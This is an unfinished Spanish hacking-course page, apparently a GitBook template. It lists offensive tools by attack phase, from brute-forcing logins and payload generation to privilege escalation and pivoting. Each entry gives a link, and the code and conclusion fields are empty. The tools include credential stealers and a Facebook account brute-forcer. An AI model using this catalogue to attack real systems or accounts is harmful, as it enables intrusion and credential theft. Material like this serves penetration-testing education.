CRUNCH WORDLIST👈 --------------------------------->https://www.kali.org/tools/crunch/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
P4Iwordlists👈 --------------------------------->https://paimonhacking.gitbook.io/p4im0n_h4cking/curso-hacking-con-python/generador-de-wordlist-para-fuerza-bruta-p4iwordlist.py-1.2v
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨

💪 FUERZA BRUTA A LOGINS ❌

FUERZA BRUTA A LOGINS

HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
161 ONESIXTYONE👈 --------------------------------->https://www.kali.org/tools/onesixtyone/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-PPTP-BRUTER👈 --------------------------------->https://www.kali.org/tools/thc-pptp-bruter/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CROWBAR RDP👈 --------------------------------->https://www.kali.org/tools/crowbar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THE CRACKER PDF,ZIP,RAR,LOGIN👈 --------------------------------->https://github.com/XDeadHackerX/The_Cracker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-HYDRA👈 --------------------------------->https://github.com/vanhauser-thc/thc-hydra
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-HYDRA👈 --------------------------------->https://github.com/vanhauser-thc/thc-hydra
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
T14M4T scaneo de servicios en puertos y fuerza bruta automatizado👈 --------------------------------->https://github.com/MS-WEB-BN/t14m4t
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FACEBOOK-BRUTE-FORCE👈 --------------------------------->https://github.com/likhonsible/Facebook-Brute-Force
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧

🛠️ SCRIPT DE EXPLOIT Y PAYLOADS ❌

SCRIPT DE EXPLOIT Y PAYLOADS

METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SEARCHSPLOIT👈 --------------------------------->https://www.kali.org/tools/exploitdb/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EXPLOITDB👈 --------------------------------->https://www.exploit-db.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GITHUB SEARCH👈 --------------------------------->https://github.com/search
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AWESOMEHACKING👈 --------------------------------->https://awesomehacking.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NVD VULNERABILITIES BASE👈 --------------------------------->https://nvd.nist.gov/vuln
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MSFVENOM PAYLOAD👈 --------------------------------->https://www.kali.org/tools/metasploit-framework/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MSFPC PAYLOAD👈 --------------------------------->https://www.kali.org/tools/msfpc/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RAPID7 vulnerabilidades y exploits👈 --------------------------------->https://www.rapid7.com/db/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTOOL👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTOOL👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥

🤯 EXPLOTACION ❌

EXPLOTACION

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VELO👈 --------------------------------->https://github.com/Veil-Framework/Veil
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WEB2ATTACK👈 --------------------------------->https://github.com/santatic/web2attack
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX👈 --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WEBSPLOIT👈 --------------------------------->https://github.com/The404Hacking/websploit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BEEF FRAMEWORK EXPLOTACION👈--------------------------------->https://www.kali.org/tools/beef-xss/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔

💠 ESCALADA DE PRIVILEGIOS WINDOWS ❌

ESCALADA DE PRIVILEGIOS WINDOWS

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERUP👈 --------------------------------->https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MIMIKATZ👈 --------------------------------->https://www.kali.org/tools/mimikatz/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROTTENPOTATO👈 --------------------------------->https://github.com/breenmachine/RottenPotatoNG
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWS EXPLOITS SUGGESTER👈 --------------------------------->https://github.com/AonCyberLabs/Windows-Exploit-Suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ACCESSCHK👈 --------------------------------->https://github.com/ankh2054/windows-pentest
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PSEXEC👈 --------------------------------->https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINPEAS👈 --------------------------------->https://www.kali.org/tools/peass-ng/ --->https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BLOODHOUND --------------------------------->https://github.com/BloodHoundAD/BloodHound
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EMPIRE POWERSHELL Y LINUX👈 --------------------------------->https://www.kali.org/tools/powershell-empire/ -->https://github.com/EmpireProject/Empire
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LOLBAS👈 --------------------------------->https://lolbas-project.github.io/#
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WADCOMS comandos👈 --------------------------------->https://wadcoms.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HIJACKLIBS DLL👈 --------------------------------->https://hijacklibs.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRINTSPOOFER👈 --------------------------------->https://github.com/itm4n/PrintSpoofer
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROGUEWINRM👈 --------------------------------->https://github.com/antonioCoco/RogueWinRM
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWSPRIVESC metodos👈 --------------------------------->https://github.com/debiantano/WindowsPrivesc
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERSPLOIT👈 --------------------------------->https://www.kali.org/tools/powersploit/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EVIL-WINRM👈 --------------------------------->https://www.kali.org/tools/evil-winrm/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️

🐧 ESCALADA DE PRIVILEGIOS LINUX ❌

ESCALADA DE PRIVILEGIOS LINUX

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX KERNEL CVEs👈 --------------------------------->https://www.linuxkernelcves.com/cves
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINENUM👈 --------------------------------->https://github.com/rebootuser/LinEnum
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINPEAS👈 --------------------------------->https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ENUMERACION SMART LINUX👈 --------------------------------->https://github.com/diego-treitos/linux-smart-enumeration
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUXPRIVCHECKER👈 --------------------------------->https://github.com/sleventyeleven/linuxprivchecker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX EXPLOIT SUGGESTER👈 --------------------------------->https://github.com/The-Z-Labs/linux-exploit-suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHKROOTKIT👈 --------------------------------->https://github.com/Magentron/chkrootkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LYNIS👈 --------------------------------->https://github.com/CISOfy/lynis
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
UNIX-PRIVESC-CHECK👈 --------------------------------->https://github.com/pentestmonkey/unix-privesc-check
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRDTYCOW👈 --------------------------------->https://github.com/firefart/dirtycow
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️

♻️ PIVOTING ❌

PIVOTING

SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PROXYCHAINS👈 --------------------------------->https://github.com/rofl0r/proxychains-ng
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCAT👈 --------------------------------->https://nmap.org/ncat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHISEL👈 --------------------------------->https://github.com/jpillora/chisel--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CORKSCREW👈 --------------------------------->https://github.com/bryanpkc/corkscrew
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://github.com/rapid7/metasploit-framework
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METERPRETER👈 --------------------------------->https://www.metasploit.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
REGEORG👈 --------------------------------->https://github.com/sensepost/reGeorg
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RPIVOT👈 --------------------------------->https://github.com/klsecservices/rpivot
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀

Last updated 1 year ago